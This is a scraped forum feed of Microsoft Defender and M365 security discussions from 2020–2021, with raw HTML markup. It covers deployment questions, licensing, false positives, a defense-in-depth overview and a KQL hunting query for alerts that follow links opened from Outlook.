Those who are trialing Defender for Endpoint will notice this the most and are likely to see their Device Inventory grow from a small handful of unmanaged endpoints to 1000s or more depending on the size of their organization. A new<SPAN>&nbsp;</SPAN><STRONG>Onboarding status</STRONG><SPAN>&nbsp;</SPAN>column has been added to the Device Inventory view to help them differentiate between unmanaged and managed devices. Also, filtering capabilities have been added if they wish to hide unmanaged devices from view.</P><P>&nbsp;</P><P>The second issue customers may experience is when 3rd party threat detection and response systems (e.g.: EDR, NDR) are being used in concert with Defender for Endpoint. The active mode scanning may generate alerts in those systems. To prevent Defender for Endpoint’s active scanning from being detected as a threat, customers can implement exclusions in any applicable&nbsp;3rd party systems to ignore the scanning, which has been carefully tuned to have negligible network impact. Information on how to configure the exclusion can be found<SPAN>&nbsp;</SPAN><A href="#" target="_blank" rel="noopener nofollow noreferrer">here</A>.</P><P>&nbsp;</P><P>Thank you for your participation in the Defender for Endpoint public preview. 
More information about Endpoint Discovery can be found in the following resources:</P><P>&nbsp;</P><UL><LI>Blog:<SPAN>&nbsp;</SPAN><A href="#" target="_blank" rel="noopener nofollow noreferrer">Secure unmanaged devices with Microsoft Defender for Endpoint now</A></LI><LI>Technical Blog:<SPAN>&nbsp;</SPAN><A href="#" target="_blank" rel="noopener nofollow noreferrer">Technical drill down on Endpoint Discovery</A></LI><LI>Docs:<SPAN>&nbsp;</SPAN><A href="#" target="_blank" rel="noopener nofollow noreferrer">Device Discovery Overview</A></LI><LI>FAQ:<SPAN>&nbsp;</SPAN><A href="#" target="_blank" rel="noopener nofollow noreferrer">Device Discovery Frequently Asked Questions</A></LI></UL><P>&nbsp;</P><P>Thanks,</P><P>Chris Hallum</P><P>Senior Product Manager</P><P>M365 Security</P><P>Microsoft Corporation</P></DIV></DIV> Sat, 08 May 2021 20:34:52 GMT Deleted 2021-05-08T20:34:52Z MDATP apt-get install fails Ubuntu 21.04 <P>We are trying to install and test MDATP on Ubuntu 21.04. The installation fails at the install. If I swap with any other package the install starts fine. After digging into the files it looks like maybe MDATP is missing from the Contents-amd64.gz at&nbsp;<A href="#" target="_blank" rel="noopener"></A></P><P>&nbsp;</P><P>Note the size difference from 20.10 to 21.04</P><P>Also, the 21.04 contents contains zero references to MDATP or the opt folder</P><P>&nbsp;</P><P>$ sudo apt-get install mdatp<BR />Reading package lists... Done<BR />Building dependency tree... Done<BR />Reading state information... 
Done<BR /><STRONG>E: Unable to locate package mdatp</STRONG></P><P>&nbsp;</P> Fri, 30 Apr 2021 02:07:56 GMT JBUB_Arbala 2021-04-30T02:07:56Z Perform Advanced Hunting queries with Kusto Explorer? <P>Hello all,</P><P>&nbsp;</P><P>I have recently used Kusto Explorer in a project with Azure Data Explorer and I really liked the tool.</P><P>I would like to connect it to Microsoft 365 Defender to perform Advanced Hunting queries from that tool. Does anyone know if it is possible?&nbsp;</P><P>&nbsp;</P><P><A href="#" target="_blank"></A></P> Wed, 14 Apr 2021 12:07:37 GMT joaogcosta 2021-04-14T12:07:37Z Investigating Failed AIR <P>My client has Investigations with a status of partially remediated and the message "<SPAN>A problem prevented the remediation of some malicious entities." I have opened a support ticket, but I'm not getting any help from them. Has anyone else seen this or have any idea how to investigate?</SPAN></P><P>&nbsp;</P> Sat, 10 Apr 2021 17:54:34 GMT Dean Gross 2021-04-10T17:54:34Z Microsoft Azure and Microsoft 365 Security - my defense in depth strategy! <P>&nbsp;</P> <P>Dear Microsoft Azure and Microsoft 365 security friends,</P> <P>&nbsp;</P> <P>Who is interested in my (small) company? We don't have anything to protect and we don't have any money. Besides, we have a firewall. Furthermore, Mr. Wechsler, you are a bit paranoid with your security thinking.</P> <P>&nbsp;</P> <P>These are the first sentences I always hear when it comes to IT (Cloud) security. But the attacker is also interested in a small company, and that is to use their system as a bot.</P> <P>&nbsp;</P> <P>It's not always about money and data. What about the reputation a company has to lose? 
It takes years to build a good reputation but only one event to damage it. What about the employees, the trust in the company? Do you want to put this at risk as a company? I don't think so!</P> <P>&nbsp;</P> <P>Yes! Extended protection mechanisms always cost extra; I am absolutely aware of that. But I also pay monthly for car insurance and accident and health insurance. I'm grateful every day when I don't need the insurance. That's exactly how it should feel when it comes to IT (cloud) security.</P> <P>&nbsp;</P> <P>Let's start with my IT/Cloud security strategy. I am absolutely aware that this list is not exhaustive. There are so many components to consider, plus every infrastructure/company is always different. I'll try to give you a little help here.</P> <P>&nbsp;</P> <P>We start with Microsoft 365: as a first additional measure, use all policies that start with "Anti-". You can find all the information in the Microsoft 365 Security Center.<BR /><A href="#" target="_blank" rel="noopener"></A></P> <P>&nbsp;</P> <P>The next step is to use the policies that start with "Safe". You can also find this information in the Microsoft 365 Security Center.</P> <P>&nbsp;</P> <P>Multi-factor authentication is a key element to further protect your identities/users. You can set this up per user or with a Conditional Access Policy (my preferred way). 
Azure Active Directory helps you integrate this protection.<BR /><A href="#" target="_blank" rel="noopener"></A></P> <P>&nbsp;</P> <P>If you are subject to a regulatory agency, the Microsoft 365 Compliance Center can help.&nbsp;Here you can set up data loss prevention policies, audits, eDiscovery and much more.<BR /><A href="#" target="_blank" rel="noopener"></A></P> <P>&nbsp;</P> <P>In this day and age of bring your own device and work from home, it's a good idea to include the Endpoint Manager. With it you have the possibility to manage endpoints (Mobile Device Management - MDM) and applications (Mobile Application Management - MAM).<BR /><A href="#" target="_blank" rel="noopener"></A></P> <P>&nbsp;</P> <P>Get visibility into your cloud apps using sophisticated analytics to identify and protect against cyberthreats, detect Shadow IT, and control how your data travels.<BR /><A href="#" target="_blank" rel="noopener"></A></P> <P>&nbsp;</P> <P>The Cloud App Security Portal provides you with the best possible support. Here you can allow or sanction cloud apps, configure anti-ransomware policies, data loss prevention policies and much more.</P> <P>&nbsp;</P> <P>Do you want to know how your Windows Active Directory is doing? Then Microsoft Defender for Identity will help you. With this tool you can transfer the local information to the cloud. 
It also has an interface to the Cloud App Security Portal.<BR /><A href="#" target="_blank" rel="noopener"></A></P> <P>&nbsp;</P> <P>No person should always work with elevated rights. Only work with elevated rights when it is really necessary. This is where Azure Privileged Identity Management (PIM) comes in. With this tool you can configure the access as you need it.<BR /><A href="#" target="_blank" rel="noopener"></A></P> <P>&nbsp;</P> <P>With Azure Identity Protection you have a tool that allows organizations to accomplish three key tasks:</P> <P>1. Automate the detection and remediation of identity-based risks.<BR />2. Investigate risks using data in the portal.<BR />3. Export risk detection data to third-party utilities for further analysis.<BR /><A href="#" target="_blank" rel="noopener"></A></P> <P>&nbsp;</P> <P>Just-in-time access for administrators: this is also possible for virtual machines, with Just-in-time VM Access. In Azure Security Center you can configure this feature (and much more).</P> <P>Azure Sentinel helps you keep track of the health of your organization. 
A SIEM (Security Information and Event Management) and SOAR (Security Orchestration, Automation and Response) tool that should not be missing from your portfolio. The tool offers many connectors (98 at the moment) so that you can connect the most diverse portals to Sentinel.</P> <P>&nbsp;</P> <P>There is still so much to show; I haven't talked about Role Based Access Control (RBAC) or Network Security Groups (NSG) here, etc. I know some of you are thinking, hey, there is a lot more. I am aware of that. My goal is to give you some positive signals on how you can integrate additional security into your organization.</P> <P>&nbsp;</P> <P>Thank you and kind regards, Tom Wechsler</P> <P>&nbsp;</P> Sat, 25 Sep 2021 13:35:55 GMT TomWechsler 2021-09-25T13:35:55Z Microsoft defender for Endpoint network best practices <P>Are there any best practices out there around network configuration of MDE for Windows Server workloads in AWS and Azure? Also, should networking settings differ based on server workload, i.e. database server or SAP application vs domain controller?</P><P>&nbsp;</P> Fri, 12 Mar 2021 02:53:15 GMT Gurdev Singh 2021-03-12T02:53:15Z MDATP for servers pre-requisites <P>Does anyone know if Configuration Manager is required to deploy and manage Defender ATP Antivirus on Windows and Linux servers?&nbsp;</P><P>&nbsp;</P><P>I know Intune can be used to manage Windows 10 devices. 
However, my question is specifically for servers using MDATP antivirus.</P> Mon, 08 Mar 2021 00:00:07 GMT Gurdev Singh 2021-03-08T00:00:07Z Using watchlist in Defender <P>Is there any way to use a watchlist in any of the Defender products like we can in Sentinel?</P> Sat, 06 Mar 2021 17:16:26 GMT Dean Gross 2021-03-06T17:16:26Z Operational Procedures <P>One of my clients would like to have a set of operational procedures to give to new people that define the action items that should be done every day/week/month in the Defender suite. Has anyone created anything like this that they are willing to share?</P><P>TIA</P><P>Dean</P> Mon, 22 Feb 2021 14:18:46 GMT Dean Gross 2021-02-22T14:18:46Z Microsoft Defender for Mac <P>I have a 365 account which I use for work and would like to install Defender on my personal MacBook Pro (which I use for work).</P><P>&nbsp;</P><P>Why am I having so much trouble figuring out where and how to download/install it?</P> Sun, 21 Feb 2021 16:53:01 GMT Badlamb 2021-02-21T16:53:01Z Where to start? <P>Hello,</P><P>&nbsp;</P><P>Where to start to understand how the various pillars of Defender work? How to understand in what mode to create a pilot? Training?</P><P>For example, I want to start using Defender for Office 365. I have users with M365 Basic and Standard Business subscriptions, so I have to add it as an add-on, but: could I add it to some users and then remove it after the tests?&nbsp;</P><P>Also, I know that I can add Defender for Endpoint to my subscriptions, but where do I find prices for this for M365 Business subscriptions (I found them only for enterprise subscriptions)?</P><P>&nbsp;</P><P>Marco</P> Fri, 05 Feb 2021 20:45:19 GMT Marco Mangiante 2021-02-05T20:45:19Z Automatic investigations are failing <P><SPAN>My client is seeing many failed AIR jobs in the Investigations page. These are typically for "Mail with malicious user is zapped" investigations. Has anyone else seen this? 
Any idea why it would be occurring?</SPAN></P> Wed, 20 Jan 2021 21:10:46 GMT Dean Gross 2021-01-20T21:10:46Z Microsoft Credential Guard pop up after activating <P><SPAN>I activated Credential Guard on Windows 10 1909 on multiple machines; all of them now have a blank security pop-up that repeatedly comes back. How do I stop this from happening?&nbsp;</SPAN></P> Thu, 14 Jan 2021 14:42:05 GMT Hello1905 2021-01-14T14:42:05Z Safe attachment policy Do we have any sample malicious attachments to test the deployed ATP safe attachment policy? Thu, 14 Jan 2021 11:10:15 GMT Rahul_Parmar 2021-01-14T11:10:15Z Virus Detection <P>Hi everyone.</P><P>I have serious concerns about my privacy and I believe my laptop and phone contain some virus. How can I discover that?</P><P>Windows Defender told me "your computer runs normal" and even my mobile app told me no threat.</P><P>I hope you can help me to discover these threats and solve these concerns.</P><P>&nbsp;</P> Thu, 24 Dec 2020 00:23:20 GMT Blila 2020-12-24T00:23:20Z Internal DOS commands in Advanced Hunting <P>Hello,</P><P>&nbsp;</P><P>Is there a way to detect internal DOS commands in Advanced Hunting? For example, commands (in cmd.exe or PowerShell) like "cd" or "type" are internal and don't have any executable (unlike ping.exe). Is there a way to track those commands?</P><P>&nbsp;</P><P>Best regards</P> Thu, 03 Dec 2020 20:40:32 GMT vboucher 2020-12-03T20:40:32Z Intune + Defender features <P>How to integrate Defender &amp; Intune?</P><P>What benefits are there in Defender?</P> Wed, 25 Nov 2020 16:28:16 GMT urskarthik83 2020-11-25T16:28:16Z What can we do if we cannot cover the full M365 Defender platform (threat protection platform)? 
<P>Hi team,</P> <P>&nbsp;</P> <P>I'm curious about M365 Defender: it's a cybersecurity platform, and it fully benefits us when we have all Defender components/services as below:</P> <OL> <LI>Microsoft Defender for Endpoint</LI> <LI>Microsoft Defender for Office 365</LI> <LI>Microsoft Defender for Identity</LI> <LI>Microsoft Cloud App Security</LI> </OL> <P>So, what happens if we cannot fully purchase the above components, assuming only some components are purchased and not everything is covered?</P> <P>&nbsp;</P> <P>For example, if we only purchased Defender for Identity and MCAS, what are the limitations and scope for management in the Threat protection portal?</P> <P>&nbsp;</P> <P>I would highly appreciate you sharing your experience/advice for this case.</P> <P>&nbsp;</P> <P>Thanks</P> Tue, 24 Nov 2020 15:27:23 GMT HuyPham-VN 2020-11-24T15:27:23Z query MC226683 Secure by Default - honoring ATP detonations <P>Under&nbsp;MC226683, Exchange Online Anti-spam policies and Safe Sender policies will no longer exempt listed senders of mail stopped as high-confidence phishes.</P><P>&nbsp;</P><P>1) Should any questions on this topic be asked here, or over in the Exchange community? 
The Product Formerly Known as ATP has always seemed to fall somewhere between the two.</P><P>&nbsp;</P><P>2) Assuming this is the right forum, do we know what action the product will take now that exemptions are not allowed for high-confidence phish?</P><P>&nbsp;</P><P>3) Assuming a particular sender persistently ends up being detained as a high-confidence phisher by the product and we can see that there is no problem with the mail, what precisely are we supposed to do?</P> Mon, 16 Nov 2020 16:22:08 GMT ExMSW4319 2020-11-16T16:22:08Z Microsoft 365 Security - MSSP <P>Hi,</P><P>&nbsp;</P><P>Is it possible to access the customer's Microsoft 365 Security portal (<A href="#" target="_blank"></A>) as an MSSP?</P><P>In a similar way as one can access the customer's MS Defender for Endpoint portal by providing the tenant ID (<A href="#" target="_blank"></A>).</P><P>&nbsp;</P><P>Kind regards,</P><P>Jan</P><P>&nbsp;</P> Mon, 09 Nov 2020 14:38:31 GMT jcescut 2020-11-09T14:38:31Z Does MS Defender with ATP require Intune? <P>Background:</P><UL><LI>Our objective is for all Windows endpoints to have Microsoft Defender with ATP installed.</LI><LI>Environment has workstations and laptops.</LI><LI>All workstations and some laptops (specific use case) will not be enrolled in Intune.</LI><LI>The workstations will be managed through SCCM. 
The “specific use case laptops” will not have centralized configuration management.</LI></UL><P>&nbsp;</P><P>Question:</P><UL><LI>Does MS Defender with ATP require Intune?</LI><LI>If it does not, would this change how the product is managed?</LI></UL> Tue, 13 Oct 2020 21:34:10 GMT Kevin Watkins 2020-10-13T21:34:10Z M365 Defender ATP - manual run antivirus scan for a device starts very slow <P>Hi Everyone,</P><P>&nbsp;</P><P>I have the problem that when I want to manually start an antivirus scan from the Microsoft Defender Security Center on a specific device, it takes a very long time (sometimes up to one hour) before the scan job really starts.</P><P>&nbsp;</P><P>Does anyone have an idea what I can do to make the scan start immediately on the client when I start the scan job?</P><P>&nbsp;</P><P>Thanks in advance</P><P>&nbsp;</P><P>Kind Regards<BR />Marvin Peters</P> Wed, 07 Oct 2020 13:24:01 GMT mpeters_all41 2020-10-07T13:24:01Z What's the deal with Adobe? <P>Every single investigation shows Adobe products listed as suspicious, which seems like it's the default.&nbsp;</P><P>Other than it being a quarrel between the two companies, is there a justified reason for this (I am sure I am not the only person to notice)?&nbsp;</P><P>&nbsp;</P><P>MSFT - I don't like everything Adobe does either, but listing it as suspicious isn't fair to your user base if it's unwarranted. Please address or advise.</P><P>&nbsp;</P> Mon, 05 Oct 2020 14:13:40 GMT Jonathan Green 2020-10-05T14:13:40Z Onboard Linux Machines on MDATP <P>Hi Techs,&nbsp;</P><P><BR />I would like to onboard Linux machines on MDATP, but the local script is mentioned for up to 10 devices. How do we onboard more than 10 devices manually? 
Any suggestions?</P><P>&nbsp;</P><P><A href="#" target="_blank"></A></P> Mon, 28 Sep 2020 14:17:20 GMT SathishKumarPatchaiappan 2020-09-28T14:17:20Z Microsoft Defender Endpoint standalone license <P>Hi All,</P><P>&nbsp;</P><P>Just want to check before I go and purchase the standalone license for MS Defender Endpoint.</P><P>Does this license include the following:</P><P>1. Endpoint DLP</P><P>2. Protection in Edge</P><P>3. Microsoft Managed Desktop.</P><P>&nbsp;</P><P>Currently, we have an E3 license.</P><P>&nbsp;</P><P>thanks!!!!</P> Fri, 25 Sep 2020 07:40:10 GMT ricksj 2020-09-25T07:40:10Z Malware/Threat TrojanSpy:MSIL/AgentTesla.AQ!MTB: False positive? <P>Hello!</P><P>Windows Defender (Windows 10 Pro x64 v1909 build 18363.1016)<SPAN>&nbsp;</SPAN><STRONG>has blocked 3 times</STRONG><SPAN>&nbsp;</SPAN><A href="#" target="_blank" rel="noopener">AgentTesla malware</A>&nbsp;on a dual-boot machine (with Linux Mint 19.2 x64). As you may see in the picture below, <STRONG>it does not say from&nbsp;</STRONG><U><EM>where&nbsp;</EM></U><STRONG>it was removed.</STRONG></P><P><EM>Windows Defender snapshot</EM></P><P>&nbsp;</P><P>In my own research I could find that AgentTesla is one of those<SPAN>&nbsp;</SPAN><STRONG>malware that steal and transmit/disclose user info</STRONG><SPAN>&nbsp;</SPAN>as well as acting as a<SPAN>&nbsp;</SPAN><STRONG>gateway for ransomware</STRONG>. It is a<SPAN>&nbsp;</SPAN><SPAN>.NET-based malware</SPAN>.</P><P>&nbsp;</P><P>Microsoft says that "<A href="#" target="_blank" rel="noopener">Windows Defender Antivirus detects and removes this threat.</A>". 
Nonetheless,&nbsp;<STRONG>I have done my best to find and remove it but I was not successful</STRONG>. I have employed:</P><P class="lia-indent-padding-left-30px"><BR />Windows Defender, which has been run in quick, full, custom (c:\ only) &amp; offline modes;<BR />Microsoft Safety Scanner;<BR />Linux: clamav (from Cisco), running twice with and without the extra unofficial malware signatures;<BR />Bootable Rescue Disks (.iso) from Norton, Trend Micro and Avira;<BR />Windows-based tools Norton Power Eraser and Trend Micro tool.</P><P><BR />As I mentioned above, none of them have found it (okay, it may have been indeed removed).</P><P>&nbsp;</P><P>I would like to know if those notifications could be some sort of<SPAN>&nbsp;</SPAN><STRONG>false positive</STRONG>. I have never received what seems to be a false positive notification from Microsoft Defender. I have to admit it has startled me.&nbsp;Moreover, may I consider this machine clean?</P><P>&nbsp;</P><P>As usual, all signatures / virus intelligence were updated before scanning.</P><P>Thank you,</P><P>Sandro</P><P>&nbsp;</P> Mon, 21 Sep 2020 15:21:30 GMT sandro 2020-09-21T15:21:30Z Manage security alerts in Microsoft 365 security center(MTP), Sentinel or separately? <P>I have some questions and would like to receive opinions that can contribute.</P><P>&nbsp;</P><P>I have the solutions in my environment and I'm in doubt about how to centralize everything.</P><P>&nbsp;</P><P>I have Azure Sentinel receiving the Defender ATP, MCAS, Azure ATP, Office 365 ATP logs, among others.</P><P>&nbsp;</P><P>I also have MCAS integrated with Azure ATP.</P><P>&nbsp;</P><P>The question is: 
Where should all technologies be centralized?</P><P>&nbsp;</P><P>That is, if I use Microsoft 365 Security Center to centralize Defender ATP, Azure ATP, MCAS and Office ATP, does it still make sense to receive these logs in Sentinel?</P><P>&nbsp;</P><P>Would it be possible to integrate alerts generated in Sentinel with Microsoft 365 Security Center?</P><P>&nbsp;</P><P>If I receive the solution logs on Sentinel, what would be the meaning of Microsoft 365 Security Center? Can I work with both, centralizing the solutions in both?</P><P>&nbsp;</P><P>I know that there may not be a final answer, but I would be happy to get your position.</P><P>&nbsp;</P><P>Thank you.</P> Tue, 15 Sep 2020 20:43:16 GMT luizao_lf 2020-09-15T20:43:16Z Desperate for help... ATP classified our domain as malicious by mistake and that's destroying us <P class="">Since Saturday, every time anyone with Microsoft ATP enabled clicks on a link from our domain, safe links blocks it and tells them that our site is malicious (which it's not).</P><P>&nbsp;</P><P>Our domain is marked as safe on all the other security providers we've found. 
Only Microsoft Advanced Threat Protection is blocking it.</P><P>&nbsp;</P><P>There has to be a way for Microsoft to fix the issue on their blocked domain list inside ATP (safelinks).</P><P><SPAN>With so many Office 365 users in B2B,&nbsp;blocking and pointing a safe company's domain as malicious by mistake causes a really big problem for that company and can cost serious, irreparable damage to it.&nbsp;</SPAN><BR /><BR />This situation is really hurting our business at a deep level.</P><P>&nbsp;</P><P>Can anyone help please?<BR /><BR />Thanks!</P> Mon, 14 Sep 2020 16:27:31 GMT jmadriz 2020-09-14T16:27:31Z Switch TimeZone UTC to my local Timezone <P>Hi All,&nbsp;&nbsp;</P><P>This is the first time I have had to investigate a security incident via the Defender ATP portal.</P><P>Nice insight, BUT I see that when I want to check a particular time frame, this is in UTC.</P><P>&nbsp;</P><P>At this moment I see my message:&nbsp; <SPAN>Your content was last auto-saved at 09:08 AM&nbsp; &nbsp;but now in Amsterdam it is 18:08</SPAN></P><P>&nbsp;</P><P>What I normally see is that I can adjust my profile to a time zone. The data I see is also, in reality, the time I need to explore.</P><P>&nbsp;</P><P>Question:</P><P>1) Where can I switch this portal to local time, to be able to search for the correct data?</P><P>2) If this is not possible, for the data collected&nbsp;@ laptop, what time frame should I select to see the data from the device between 08:00 CET and 09:00 CET?</P><P>&nbsp;</P><P>thanks</P><P>Jan&nbsp;</P><P>&nbsp;</P> Fri, 11 Sep 2020 16:18:59 GMT jgswinkels-C 2020-09-11T16:18:59Z How to Deal with Undetected Malware? <P>Hi,</P><P>&nbsp;</P><P>Anti-Malware products like Windows Defender are getting smarter and stronger, and it is not easy to find malware which won't be detected by them. 
In case we face such a case, we will send them to the Microsoft Anti-Malware team for analysis, and we do have other defensive layers.</P><P>&nbsp;</P><P>I am just wondering, during the 0-day period where we are waiting for a signature and we face undetected malware, how are you dealing with it and protecting your environments?</P><P>&nbsp;</P><P>Let me share some clues:</P><P>&nbsp;</P><P>1) Use AppLocker to block them manually</P><P>2) Write some emergency PowerShell scripts</P><P>3) Isolate infected device</P><P>4) Implement some emergency policies</P><P>&nbsp;</P><P>In case ATP is available, it would be much easier, but let's say how we handle it without ATP (consider the complex scenario) and then we discuss using ATP (as the easy scenario).</P><P>&nbsp;</P><P>I am interested to hear what you think.&nbsp;</P> Sat, 08 Aug 2020 13:38:26 GMT Reza_Ameri-Archived 2020-08-08T13:38:26Z Automate pending actions <P>In the Action Center I would like to automatically reject the pending actions "Block URL" and "Soft delete emails".&nbsp;<SPAN>I know this is not natively supported, but is there a way to automate this using PowerShell, Power Automate, Security Graph API or something else?</SPAN></P> Thu, 06 Aug 2020 17:12:29 GMT Joachim83 2020-08-06T17:12:29Z Share Your Hunting Challenges! <P>Hello world!&nbsp;<LI-USER uid="104809"></LI-USER>&nbsp;and I would love your input on anything you would like demo'ed in future webcasts! Want to see us demonstrate a specific hunting capability? Got a query challenge on your mind? 
Reply with your idea or like a reply from the community - we'll pick some of the popular ideas and put together future webcasts on the topics.</P> <P>&nbsp;</P> <P>Also, if you are looking for a great introduction to advanced hunting in MTP and KQL, be sure to check out our four-part series Tracking the Adversary at&nbsp;<A href="#" target="_blank" rel="noopener"></A>, or download the query files to practice on your own MTP instance at <A href="#" target="_blank" rel="noopener"></A>.&nbsp;</P> <P>&nbsp;</P> <P>Happy hunting!</P> <P>&nbsp;</P> <P>&nbsp;</P> Wed, 05 Aug 2020 13:53:21 GMT MichaelJMelone 2020-08-05T13:53:21Z Can you help me in this query let minTimeRange = ago(7d);<BR />let outlookLinks =<BR />DeviceEvents<BR />| where Timestamp &gt; minTimeRange and ActionType == "BrowserLaunchedToOpenUrl" and<BR />isnotempty(RemoteUrl)<BR />| where<BR />InitiatingProcessFileName =~ "outlook.exe"<BR />or InitiatingProcessFileName =~ "runtimebroker.exe"<BR />| project Timestamp , DeviceId , DeviceName , RemoteUrl, InitiatingProcessFileName,<BR />ParsedUrl=parse_url(RemoteUrl)<BR />| extend WasOutlookSafeLink=(tostring(ParsedUrl.Host) endswith "<A href="#" target="_blank"></A>")<BR />| project Timestamp , DeviceId, DeviceName , WasOutlookSafeLink,<BR />InitiatingProcessFileName,<BR />OpenedLink=iff(WasOutlookSafeLink, url_decode(tostring(ParsedUrl["QueryParameters"]["url"])), RemoteUrl);<BR />let alerts =<BR />AlertInfo<BR />| summarize (FirstDetectedActivity, Title)=arg_min(Timestamp,Title) by AlertId<BR />| where FirstDetectedActivity &gt; minTimeRange;<BR />alerts<BR />| join kind=inner (outlookLinks) on DeviceId<BR />| where FirstDetectedActivity -<BR />Timestamp between (0min..3min)<BR />| summarize FirstDetectedActivity=min(FirstDetectedActivity),<BR />AlertTitles=make_set(Title) by OpenedLink, InitiatingProcessFileName,<BR />EventTime=bin(Timestamp, 1tick), DeviceName, DeviceId , WasOutlookSafeLink<BR /><BR />links opened 
from outlook.exe, followed by warning that was ignored by the user.<BR /><BR /> Mon, 03 Aug 2020 10:24:18 GMT Shviam 2020-08-03T10:24:18Z Notifications of new MTP incidents? <P>Hi all!</P><P>&nbsp;</P><P>Finding MTP extremely useful in incident detections and investigations, it certainly beats doing alert correlation yourself.</P><P>&nbsp;</P><P>Is there any way to trigger an email or any kind of notification when a new Incident is detected/created by MTP in the Security Portal? I'd like incidents to trigger a ticket in our service desk system which simply listens to a mailbox.</P><P>&nbsp;</P><P>I can't seem to find any documentation on this under the MTP doco?</P><P>&nbsp;</P><P>Any help would be greatly appreciated.</P><P>&nbsp;</P><P>Kind regards,</P><P>Nathan Manzi</P> Mon, 03 Aug 2020 04:23:19 GMT thehadricus 2020-08-03T04:23:19Z No email queries available <P>First of all: Thanks for the great webinars about MTP/Sentinel etc.</P><P><BR />I hope my question is right here.</P><P><BR />We use an E5 license in the company.</P><P>But the MTP does not offer me the possibility to check emails. 
All options that refer to mails are not offered to me.<BR />Unfortunately I can't find a check mark to activate this area (or I don't know in which portal I should find it).<BR />I'm pretty sure that I could see the corresponding menu items last week.<BR /><BR /></P> Wed, 29 Jul 2020 16:32:23 GMT Jan_F1801 2020-07-29T16:32:23Z MDATP KQL Query isolated machines <P>How would you write the Hunting query to identify machines that have been isolated via MDATP?</P><P>&nbsp;</P><P>Thanks,</P><P>&nbsp;</P><P>Andrew</P><P>&nbsp;</P> Wed, 29 Jul 2020 15:53:05 GMT agattsek 2020-07-29T15:53:05Z Submit Sample of Malicious Files to Microsoft <P>The Microsoft Anti-Malware engine is very powerful, and with technologies like Cloud Protection, Behavior Monitoring, etc., it is&nbsp;<STRONG>not&nbsp;</STRONG>easy for malware to bypass it. However, like any other security product and antimalware technology, there might&nbsp;be a possibility of malware which won't get detected by the Microsoft Anti-Malware product.&nbsp;</P><P>In this case, make sure to submit it to the Microsoft Anti-Malware team for analysis. It is a good idea to log in with your Microsoft Account so you can keep track of your submission and also follow up with Microsoft. You can submit a sample here:</P><P><A href="#" target="_blank"></A>&nbsp;</P><P>On this website, you may also report an incorrect detection where something is safe but is incorrectly detected as malicious. 
By submitting samples, you are not only protecting your company, but you also make the Microsoft Anti-Malware engine smarter and stronger, and this way you will protect millions of users and organizations globally.</P> Mon, 27 Jul 2020 15:17:51 GMT Reza_Ameri-Archived 2020-07-27T15:17:51Z Getting the community started <P>This is cool, I've been contributing to the MS Tech Community for years, but have never had the chance to be the first person to post in a new group.&nbsp;</P><P><BR />My question to everyone is, when looking for threats, which tool, platform or center do you start with and why?</P> Thu, 02 Jul 2020 14:11:59 GMT Dean Gross 2020-07-02T14:11:59Z